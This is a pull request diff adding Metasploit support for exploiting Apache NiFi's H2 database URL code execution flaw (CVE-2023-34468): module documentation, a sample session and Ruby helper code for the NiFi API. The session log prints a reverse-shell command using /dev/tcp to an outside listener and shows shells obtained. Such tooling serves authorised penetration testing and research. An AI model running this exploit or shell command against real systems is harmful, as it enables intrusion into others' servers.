### PR TITLE
apache nifi h2 rce (CVE-2023-34468)

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_nifi_h2_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_nifi_h2_rce.md
@@ -1,0 +1,97 @@
+## Vulnerable Application
+
+The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
+Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
+to configure a Database URL with the H2 driver that enables custom code execution.
+This exploit will create a new ExecuteSQL process, connect it to a DB Connection
+Pool, and create a new H2 based connection.  The connection is able to create
+a new memory based h2 database on the fly, with a code execution inlined that
+executes when the H2 connection, and process are started.
+
+This exploit will result in several shells (5-7).
+Successfully tested against Apache nifi 1.16.0 through 1.21.0.
+
+### Vulnerable Docker Images
+
+Docker images are available, and exploitable in the default configuration.
+
+```
+docker run -p 8443:8443 apache/nifi:1.20.0
+```
+
+After the image runs for a minute or two, you'll need to grab a set of credentials
+by running grep against the logs:
+
+```
+docker logs [container_id] | grep Generated
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `set rhosts [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### DELAY
+
+The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`
+
+## Scenarios
+
+### Nifi 1.20.0 on Docker
+
+```
+msf6 > use exploit/linux/http/apache_nifi_h2_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362
+username => 4b6caac4-e1c6-431d-8e63-f014a6541362
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1
+password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit
+
+[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
+[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e
+[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e
+[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237
+[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)
+[+] Enabling db connection pool
+[+] Starting processor
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400
+[*] Waiting 15 seconds before stopping and deleting
+[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400
+[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400
+[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400
+[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400
+[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400
+[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237
+[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4
+[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237
+[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4
+[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b
+
+id
+uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
+uname -a
+Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
+```

--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -36,6 +36,12 @@ Verified against 1.12.1, 1.12.1-RC2, and 1.20.0
 
 ### Configuring a Vulnerable Environment
 
+#### Docker
+
+```
+docker run -p 8443:8443 -d apache/nifi:1.22.0
+```
+
 #### Windows
 
 1. Download the NiFi binaries zip file from [nifi.apache.org](https://nifi.apache.org/download.html).

--- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md
@@ -39,7 +39,7 @@ Verified against 1.12.1, 1.12.1-RC2, and 1.20.0
 #### Docker
 
 ```
-docker run -p 8443:8443 -d apache/nifi:1.22.0
+docker run -p 8443:8443 -d apache/nifi:1.20.0
 ```
 
 #### Windows

--- a/lib/msf/core/exploit/remote/http/nifi.rb
+++ b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -1,0 +1,188 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with wordpress installations
+        module Nifi
+          include Msf::Exploit::Remote::HttpClient
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::OptString.new('USERNAME', [false, 'Username to authenticate with']),
+                Msf::OptString.new('PASSWORD', [false, 'Password to authenticate with']),
+                Msf::OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
+              ], Msf::Exploit::Remote::HTTP::Nifi
+            )
+          end
+
+          # Checks the API response to see if its what is expected and returns a valid result.
+          #
+          # @param description [String] The description of what is being checked
+          # @param response [String] The response to check
+          # @param expected_response_code [Int] HTTP Response code that is expected
+          # @param item [Int] The item in the JSON blob that is needed
+          # @return the value of the item from the JSON blob from the response
+          def check_response(description, response, expected_response_code, item = '')
+            # Check that response was received
+            fail_with(Msf::Module::Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response
+            # Check that response code was expected
+            if response.code != expected_response_code
+              fail_with(Msf::Module::Failure::UnexpectedReply,
+                        "Unexpected HTTP response code from API when #{description} " \
+                        "(received #{response.code}, expected #{expected_response_code})")
+            end
+            # Check that item can be retrieved
+            return if item.empty?
+
+            body = response.get_json_document
+            unless body.key?(item)
+              fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
+            end
+            body[item]
+          end
+
+          # Determines if the Apache Nifi instance supports login.
+          #
+          # @return the value of supportsLogin from the server
+          def supports_login
+            response = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, 'access', 'config')
+            })
+            config = check_response('GETting access configuration', response, 200, 'config')
+            config['supportsLogin']
+          end
+
+          # Fetch the root process group's UUID
+          #
+          # @param token [String] The bearer token from a valid login
+          # @return [String] The UUID of the root process group
+          def fetch_root_process_group(token)
+            opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            check_response('GETting root process group', response, 200, 'id')
+          end
+
+          # Creates a processor in a process group
+          #
+          # @param token [String] The bearer token from a valid login
+          # @param process_group [String] UUID of a processor group
+          # @param type [String] What type of processor to create
+          # @return [String] The UUID of the root process group
+          def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
+            body = {
+              'component' => { 'type' => type },
+              'revision' => { 'version' => 0 }
+            }
+            opts = {
+              'method' => 'POST',
+              'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
+              'ctype' => 'application/json',
+              'data' => body.to_json
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
+          end
+
+          # Get a processor in a process group
+          #
+          # @param token [String] The bearer token from a valid login
+          # @param processor [String] UUID of a processoror
+          # @param field [String] the key from the JSON blob to return
+          # @return [String] THe value from the specified field
+          def get_processor(token, processor, field = 'id')
+            opts = {
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, 'processors', processor)
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            check_response("GETting processor #{processor}", response, 200, field)
+          end
+
+          # Delete a processor
+          #
+          # @param token [String] The bearer token from a valid login
+          # @param processor [String] UUID of the processes
+          # @param version [Int] The version number to delete
+          def delete_processor(token, processor, version = 0)
+            opts = {
+              'method' => 'DELETE',
+              'uri' => normalize_uri(target_uri.path, 'processors', processor),
+              'vars_get' => { 'version' => version }
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            # if we tried to delete the old revision, go ahead and delete the newer one
+            # arbitrary version limit of 20
+            while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
+              version += 1
+              vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}")
+              opts['vars_get'] = { 'version' => version }
+              response = send_request_cgi(opts)
+            end
+
+            check_response("DELETEting processor #{processor}", response, 200)
+          end
+
+          # Stop processor
+          #
+          # @param token [String] The bearer token from a valid login
+          # @param processor [String] UUID of the processes
+          def stop_processor(token, processor)
+            body = {
+              'revision' => {
+                'clientId' => 'x',
+                'version' => 1
+              },
+              'state' => 'STOPPED'
+            }
+            opts = {
+              'method' => 'PUT',
+              'uri' => normalize_uri(target_uri.path, 'processors', processor, 'run-status'),
+              'ctype' => 'application/json',
+              'data' => body.to_json
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            check_response("PUTting processor #{processor} stop command", response, 200)
+
+            # Stop may not have worked (but must be done first). Terminate threads now
+            opts = {
+              'method' => 'DELETE',
+              'uri' => normalize_uri(target_uri.path, 'processors', processor, 'threads')
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            response = send_request_cgi(opts)
+            check_response("DELETEing processor #{processor} terminate threads command", response, 200)
+          end
+
+          # Attempts a login with username and password to retrieve a bearer token for APIs
+          #
+          # @return [String] The bearer token on successful login
+          def retrieve_login_token
+            response = send_request_cgi(
+              {
+                'method' => 'POST',
+                'uri' => normalize_uri(target_uri.path, 'access', 'token'),
+                'vars_post' => {
+                  'username' => datastore['USERNAME'],
+                  'password' => datastore['PASSWORD']
+                }
+              }
+            )
+            check_response('POSTing credentials', response, 201)
+            response.body
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/nifi.rb
+++ b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -33,41 +33,24 @@ module Msf
           #
           # @return [Gem::Version] version number of the system, or nil on error
           def get_version
+            vprint_status('Attempting to retrieve version number')
             res = send_request_cgi!(
               'uri' => normalize_uri(target_uri.path, 'nifi/')
             )
 
-            fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
-            fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
+            if res.nil?
+              print_bad("#{peer} - Could not connect to web service - no response")
+              return nil
+            end
 
-            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]+)">}
+            unless res.code == 200
+              print_bad("#{peer} - Unexpected Respones Code (response code: #{res.code})")
+              return nil
+            end
+
+            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
 
             nil
-          end
-
-          # Checks the API response to see if its what is expected and returns a valid result.
-          #
-          # @param description [String] The description of what is being checked
-          # @param response [String] The response to check
-          # @param expected_response_code [Int] HTTP Response code that is expected
-          # @param item [Int] The item in the JSON blob that is needed
-          # @return the value of the item from the JSON blob from the response
-          def check_response(description, response, expected_response_code, item = '')
-            # Check that response was received
-            fail_with(Msf::Module::Failure::Unreachable, "Unable to retrieve HTTP response from API when #{description}") unless response
-            # Check that response code was expected
-            if response.code != expected_response_code
-              fail_with(Msf::Module::Failure::UnexpectedReply,
-                        "Unexpected HTTP response code from API when #{description} " \
-                        "(received #{response.code}, expected #{expected_response_code})")
-            end
-            # Check that item can be retrieved
-            return if item.empty?
-
-            body = response.get_json_document
-
-            fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}") unless body.key?(item)
-            body[item]
           end
 
           # Fetch the root process group's UUID
@@ -75,13 +58,18 @@ module Msf
           # @param token [String] The bearer token from a valid login
           # @return [String] The UUID of the root process group
           def fetch_root_process_group(token)
+            vprint_status('Attempting to retrieve root process group')
             opts = {
               'method' => 'GET',
               'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', 'root')
             }
             opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            check_response('GETting root process group', response, 200, 'id')
+            res = send_request_cgi(opts)
+            unless res.code == 200
+              print_bad("Unexpected response code: #{res.code}")
+              return nil
+            end
+            res.get_json_document['id']
           end
         end
       end

--- a/lib/msf/core/exploit/remote/http/nifi.rb
+++ b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -44,7 +44,7 @@ module Msf
             end
 
             unless res.code == 200
-              print_bad("#{peer} - Unexpected Respones Code (response code: #{res.code})")
+              print_bad("#{peer} - Unexpected Response Code (response code: #{res.code})")
               return nil
             end
 
@@ -55,7 +55,7 @@ module Msf
 
           # Fetch the root process group's UUID
           #
-          # @param token [String] The bearer token from a valid login
+          # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
           # @return [String] The UUID of the root process group
           def fetch_root_process_group(token)
             vprint_status('Attempting to retrieve root process group')
@@ -65,6 +65,12 @@ module Msf
             }
             opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
             res = send_request_cgi(opts)
+            
+            if res.nil?
+              print_bad("#{peer} - Could not connect to web service - no response")
+              return nil
+            end
+
             unless res.code == 200
               print_bad("Unexpected response code: #{res.code}")
               return nil

--- a/lib/msf/core/exploit/remote/http/nifi.rb
+++ b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -40,7 +40,7 @@ module Msf
             fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
             fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
 
-            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
+            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]+)">}
 
             nil
           end
@@ -65,9 +65,8 @@ module Msf
             return if item.empty?
 
             body = response.get_json_document
-            unless body.key?(item)
-              fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}")
-            end
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to retrieve #{item} from HTTP response when #{description}") unless body.key?(item)
             body[item]
           end
 

--- a/lib/msf/core/exploit/remote/http/nifi.rb
+++ b/lib/msf/core/exploit/remote/http/nifi.rb
@@ -4,20 +4,45 @@ module Msf
   class Exploit
     class Remote
       module HTTP
-        # This module provides a way of interacting with wordpress installations
+        # This module provides a way of interacting with Apache NiFi installations
         module Nifi
           include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Nifi::Auth
+          include Msf::Exploit::Remote::HTTP::Nifi::Processor
+          include Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
 
           def initialize(info = {})
             super
 
             register_options(
               [
+                Msf::Opt::RPORT(8443),
+                Msf::OptString.new('TARGETURI', [ true, 'The URI of the Apache NiFi Application', '/']),
                 Msf::OptString.new('USERNAME', [false, 'Username to authenticate with']),
                 Msf::OptString.new('PASSWORD', [false, 'Password to authenticate with']),
                 Msf::OptString.new('BEARER-TOKEN', [false, 'JWT authenticate with']),
               ], Msf::Exploit::Remote::HTTP::Nifi
             )
+
+            register_advanced_options([
+              Msf::OptBool.new('SSL', [true, 'Negotiate SSL connection', true])
+            ])
+          end
+
+          # Find the version number of the Apache NiFi system based on JS calls on the nifi/ page.
+          #
+          # @return [Gem::Version] version number of the system, or nil on error
+          def get_version
+            res = send_request_cgi!(
+              'uri' => normalize_uri(target_uri.path, 'nifi/')
+            )
+
+            fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+            fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
+
+            return Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{js/nf/nf-namespace\.js\?([\d.]*)">}
+
+            nil
           end
 
           # Checks the API response to see if its what is expected and returns a valid result.
@@ -46,140 +71,18 @@ module Msf
             body[item]
           end
 
-          # Determines if the Apache Nifi instance supports login.
-          #
-          # @return the value of supportsLogin from the server
-          def supports_login
-            response = send_request_cgi({
-              'method' => 'GET',
-              'uri' => normalize_uri(target_uri.path, 'access', 'config')
-            })
-            config = check_response('GETting access configuration', response, 200, 'config')
-            config['supportsLogin']
-          end
-
           # Fetch the root process group's UUID
           #
           # @param token [String] The bearer token from a valid login
           # @return [String] The UUID of the root process group
           def fetch_root_process_group(token)
-            opts = { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'process-groups', 'root') }
+            opts = {
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', 'root')
+            }
             opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
             response = send_request_cgi(opts)
             check_response('GETting root process group', response, 200, 'id')
-          end
-
-          # Creates a processor in a process group
-          #
-          # @param token [String] The bearer token from a valid login
-          # @param process_group [String] UUID of a processor group
-          # @param type [String] What type of processor to create
-          # @return [String] The UUID of the root process group
-          def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
-            body = {
-              'component' => { 'type' => type },
-              'revision' => { 'version' => 0 }
-            }
-            opts = {
-              'method' => 'POST',
-              'uri' => normalize_uri(target_uri.path, 'process-groups', process_group, 'processors'),
-              'ctype' => 'application/json',
-              'data' => body.to_json
-            }
-            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            check_response("POSTing new processor in process group #{process_group}", response, 201, 'id')
-          end
-
-          # Get a processor in a process group
-          #
-          # @param token [String] The bearer token from a valid login
-          # @param processor [String] UUID of a processoror
-          # @param field [String] the key from the JSON blob to return
-          # @return [String] THe value from the specified field
-          def get_processor(token, processor, field = 'id')
-            opts = {
-              'method' => 'GET',
-              'uri' => normalize_uri(target_uri.path, 'processors', processor)
-            }
-            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            check_response("GETting processor #{processor}", response, 200, field)
-          end
-
-          # Delete a processor
-          #
-          # @param token [String] The bearer token from a valid login
-          # @param processor [String] UUID of the processes
-          # @param version [Int] The version number to delete
-          def delete_processor(token, processor, version = 0)
-            opts = {
-              'method' => 'DELETE',
-              'uri' => normalize_uri(target_uri.path, 'processors', processor),
-              'vars_get' => { 'version' => version }
-            }
-            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            # if we tried to delete the old revision, go ahead and delete the newer one
-            # arbitrary version limit of 20
-            while response.code == 400 && response.body.include?('is not the most up-to-date revision') && version <= 20
-              version += 1
-              vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}")
-              opts['vars_get'] = { 'version' => version }
-              response = send_request_cgi(opts)
-            end
-
-            check_response("DELETEting processor #{processor}", response, 200)
-          end
-
-          # Stop processor
-          #
-          # @param token [String] The bearer token from a valid login
-          # @param processor [String] UUID of the processes
-          def stop_processor(token, processor)
-            body = {
-              'revision' => {
-                'clientId' => 'x',
-                'version' => 1
-              },
-              'state' => 'STOPPED'
-            }
-            opts = {
-              'method' => 'PUT',
-              'uri' => normalize_uri(target_uri.path, 'processors', processor, 'run-status'),
-              'ctype' => 'application/json',
-              'data' => body.to_json
-            }
-            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            check_response("PUTting processor #{processor} stop command", response, 200)
-
-            # Stop may not have worked (but must be done first). Terminate threads now
-            opts = {
-              'method' => 'DELETE',
-              'uri' => normalize_uri(target_uri.path, 'processors', processor, 'threads')
-            }
-            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
-            response = send_request_cgi(opts)
-            check_response("DELETEing processor #{processor} terminate threads command", response, 200)
-          end
-
-          # Attempts a login with username and password to retrieve a bearer token for APIs
-          #
-          # @return [String] The bearer token on successful login
-          def retrieve_login_token
-            response = send_request_cgi(
-              {
-                'method' => 'POST',
-                'uri' => normalize_uri(target_uri.path, 'access', 'token'),
-                'vars_post' => {
-                  'username' => datastore['USERNAME'],
-                  'password' => datastore['PASSWORD']
-                }
-              }
-            )
-            check_response('POSTing credentials', response, 201)
-            response.body
           end
         end
       end

--- a/lib/msf/core/exploit/remote/http/nifi/auth.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/auth.rb
@@ -13,7 +13,10 @@ module Msf::Exploit::Remote::HTTP::Nifi::Auth
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config')
     })
 
-    return nil if res.nil?
+    if res.nil?
+      print_bad("#{peer} - Could not connect to web service - no response")
+      return nil
+    end
 
     unless res.code == 200
       print_bad("Unexpected response code: #{res.code}")
@@ -37,7 +40,10 @@ module Msf::Exploit::Remote::HTTP::Nifi::Auth
         }
       }
     )
-    return nil if res.nil?
+    if res.nil?
+      print_bad("#{peer} - Could not connect to web service - no response")
+      return nil
+    end
 
     if res.code == 400
       print_bad('Invalid Credentials')

--- a/lib/msf/core/exploit/remote/http/nifi/auth.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/auth.rb
@@ -1,23 +1,33 @@
 # -*- coding: binary -*-
 
 module Msf::Exploit::Remote::HTTP::Nifi::Auth
+  include Msf::Exploit::Remote::HttpClient
+
   # Determines if the Apache Nifi instance supports login.
   #
-  # @return the value of supportsLogin from the server
+  # @return the value of supportsLogin from the server, nil on error
   def supports_login?
-    response = send_request_cgi({
+    vprint_status('Attempting to retrieve access configuration')
+    res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config')
     })
-    config = check_response('GETting access configuration', response, 200, 'config')
-    config['supportsLogin']
+
+    return nil if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      return nil
+    end
+    res.get_json_document.dig('config', 'supportsLogin')
   end
 
   # Attempts a login with username and password to retrieve a bearer token for APIs
   #
-  # @return [String] The bearer token on successful login
+  # @return [String] The bearer token on successful login, nil on errors
   def retrieve_login_token
-    response = send_request_cgi(
+    vprint_status('Attempting to login')
+    res = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'token'),
@@ -27,7 +37,15 @@ module Msf::Exploit::Remote::HTTP::Nifi::Auth
         }
       }
     )
-    check_response('POSTing credentials', response, 201)
-    response.body
+    return nil if res.nil?
+
+    if res.code == 400
+      print_bad('Invalid Credentials')
+      return nil
+    elsif res.code != 201
+      print_bad("Unexpected response code: #{res.code}")
+      return nil
+    end
+    res.body
   end
 end

--- a/lib/msf/core/exploit/remote/http/nifi/auth.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/auth.rb
@@ -1,0 +1,33 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Auth
+  # Determines if the Apache Nifi instance supports login.
+  #
+  # @return the value of supportsLogin from the server
+  def supports_login?
+    response = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config')
+    })
+    config = check_response('GETting access configuration', response, 200, 'config')
+    config['supportsLogin']
+  end
+
+  # Attempts a login with username and password to retrieve a bearer token for APIs
+  #
+  # @return [String] The bearer token on successful login
+  def retrieve_login_token
+    response = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'token'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
+        }
+      }
+    )
+    check_response('POSTing credentials', response, 201)
+    response.body
+  end
+end

--- a/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
@@ -48,18 +48,23 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
     opts = {
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool),
-      'vars_get' => {
-        'version' => version
-      }
+      'vars_get' => { 'version' => version }
     }
     opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
     res = send_request_cgi(opts)
-    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
-      vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}")
-      delete_dbconnectionpool(token, db_con_pool, version += 1)
-    end
+
     raise DBConnectionPoolError if res.nil?
 
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      opts['vars_get'] = { 'version' => version }
+
+      res = send_request_cgi(opts)
+      raise ProcessorError if res.nil?
+
+      vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}") if res.code == 400 && res.body.include?('is not the most up-to-date revision')
+    end
+    
     if version == 20
       print_bad("Aborting after attempting to delete 20 version of DB Connection Pool: #{db_con_pool}")
       raise DBConnectionPoolError

--- a/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
 
   # Stop DB Connection Pool
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param db_con_pool [String] UUID of the DBConnectionPool
   def stop_dbconnectionpool(token, db_con_pool)
     vprint_status("Attempting to stop DB Connection Pool: #{db_con_pool}")
@@ -40,7 +40,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
 
   # Delete DB Connection Pool
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param db_con_pool [String] UUID of the DBConnectionPool
   # @param version [Integer] version of the DBConnectionPool to delete
   def delete_dbconnectionpool(token, db_con_pool, version = 0)
@@ -79,7 +79,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
 
   # Start DB Connection Pool
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param db_con_pool [String] UUID of the DBConnectionPool
   def start_dbconnectionpool(token, db_con_pool)
     vprint_status("Attempting to start DB Connection Pool: #{db_con_pool}")
@@ -111,7 +111,7 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
 
   # Create DB Connection Pool
   #
-  # @param token [String] The bearer token from a valid login
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
   # @param name [String] Name to give to the db connection pool
   # @param process_group [String] UUID of the process_group
   # @param nifi_version [String] version number of the nifi instance

--- a/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
@@ -60,13 +60,13 @@ module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
       opts['vars_get'] = { 'version' => version }
 
       res = send_request_cgi(opts)
-      raise ProcessorError if res.nil?
+      raise DBConnectionPoolError if res.nil?
 
       vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}") if res.code == 400 && res.body.include?('is not the most up-to-date revision')
     end
-    
+
     if version == 20
-      print_bad("Aborting after attempting to delete 20 version of DB Connection Pool: #{db_con_pool}")
+      print_bad("Aborting after attempting to delete #{version} version of DB Connection Pool: #{db_con_pool}")
       raise DBConnectionPoolError
     end
 

--- a/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
+++ b/lib/msf/core/exploit/remote/http/nifi/dbconnectionpool.rb
@@ -1,11 +1,17 @@
 # -*- coding: binary -*-
 
 module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
+  include Msf::Exploit::Remote::HttpClient
+
+  class DBConnectionPoolError < StandardError
+  end
+
   # Stop DB Connection Pool
   #
   # @param token [String] The bearer token from a valid login
   # @param db_con_pool [String] UUID of the DBConnectionPool
   def stop_dbconnectionpool(token, db_con_pool)
+    vprint_status("Attempting to stop DB Connection Pool: #{db_con_pool}")
     body = {
       'disconnectedNodeAcknowledged' => false,
       'state' => 'DISABLED',
